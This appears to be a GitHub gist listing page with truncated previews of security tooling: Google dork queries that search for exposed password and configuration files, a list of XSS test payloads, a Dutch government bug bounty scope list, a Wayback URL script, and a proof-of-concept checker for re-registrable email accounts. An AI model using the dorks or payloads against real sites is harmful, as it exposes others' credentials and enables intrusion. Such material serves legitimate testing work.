cmartinbaughman / GoogleHackMasterList.txt

Last active November 8, 2024 20:13

The definitive super list for "Google Hacking".

	admin account info" filetype:log
	!Host=. intext:enc_UserPassword=* ext:pcf
	"# -FrontPage-" ext:pwd inurl:(service \| authors \| administrators \| users) "# -FrontPage-" inurl:service.pwd
	"AutoCreate=TRUE password=*"
	"http://:@www” domainname
	"index of/" "ws_ftp.ini" "parent directory"
	"liveice configuration file" ext:cfg -site:sourceforge.net
	"parent directory" +proftpdpasswd
	Duclassified" -site:duware.com "DUware All Rights reserved"
	duclassmate" -site:duware.com

amotmot / WAHH_Task_Checklist.md

Created April 16, 2014 21:30

The Web Application Hacker's Handbook - Task Checklist - Github-Flavored Markdown

The Web Application Hacker's Handbook

Web Application Hacker's Handbook Task checklist as a Github-Flavored Markdown file

	%253Cscript%253Ealert('XSS')%253C%252Fscript%253E
	<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
	<IMG SRC=x onafterprint="alert(String.fromCharCode(88,83,83))">
	<IMG SRC=x onbeforeprint="alert(String.fromCharCode(88,83,83))">
	<IMG SRC=x onbeforeunload="alert(String.fromCharCode(88,83,83))">
	<IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))">
	<IMG SRC=x onhashchange="alert(String.fromCharCode(88,83,83))">
	<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
	<IMG SRC=x onmessage="alert(String.fromCharCode(88,83,83))">
	<IMG SRC=x ononline="alert(String.fromCharCode(88,83,83))">

random-robbie / DutchGov.txt

Last active September 11, 2024 04:28

Dutch Gov - bug bounty scope - feel free to add more if you know they are in scope - taken from - https://www.communicatierijk.nl/vakkennis/r/rijkswebsites/verplichte-richtlijnen/websiteregister-rijksoverheid

	http://www.rijksoverheid.nl
	http://www.rivm.nl
	http://coronadashboard.rijksoverheid.nl
	http://www.nederlandwereldwijd.nl
	http://www.government.nl
	http://lci.rivm.nl
	http://www.rvo.nl
	http://www.defensie.nl
	http://www.werkenvoornederland.nl
	http://www.rijkswaterstaat.nl

mhmdiaa / waybackurls.py

Last active November 13, 2024 13:55

	import requests
	import sys
	import json


	def waybackurls(host, with_subs):
	if with_subs:
	url = 'http://web.archive.org/cdx/search/cdx?url=.%s/&output=json&fl=original&collapse=urlkey' % host
	else:
	url = 'http://web.archive.org/cdx/search/cdx?url=%s/*&output=json&fl=original&collapse=urlkey' % host

jhaddix / all.txt

Last active November 7, 2024 08:01

all wordlists from every dns enumeration tool... ever. Please excuse the lewd entries =/

This file has been truncated, but you can view the full file.

random-robbie / bountyscan_setup.sh

Last active April 26, 2024 15:49

	#!/bin/bash
	export DEBIAN_FRONTEND=noninteractive;
	echo "[] Starting Install... []"
	echo "[] Upgrade installed packages to latest []"
	echo -e "\nRunning a package upgrade...\n"
	apt-get -qq update && apt-get -qq dist-upgrade -y
	apt full-upgrade -y
	apt-get autoclean

	echo "[] Install stuff I use all the time []"

haccer / account_checker.sh

Created January 31, 2018 12:37

PoC Email Account Checker - Checks for emails that don't exist so they can be (re)created

	#!/bin/bash
	# PoC Email Account Checker - Checks for emails that don't exist so they can be (re)created
	# Use Chrome's Network tab to view the URL that makes these type of requests.
	# This is just a PoC, you can add in other email services along with other domains the current ones provide.
	# URLs have been working all night, but might need to be updated in the future.
	#
	# Usage: ./account_checker.sh <email_list>

	function google() {
	# Post data


	" _ _ "
	" _ /\|\| . . \|\|\ _ "
	" ( } \\|\|D ' ' ' C\|\|/ { % "
	" \| /\__,=_[_] ' . . ' [_]_=,__/\ \|"
	" \|_\_ \|----\| \|----\| _/_\|"
	" \| \|/ \| \| \| \| \\| \|"
	" \| /_ \| \| \| \| _\ \|"

	It is all fun and games until someone gets hacked!

Diaa Hassan Diaa-Hassan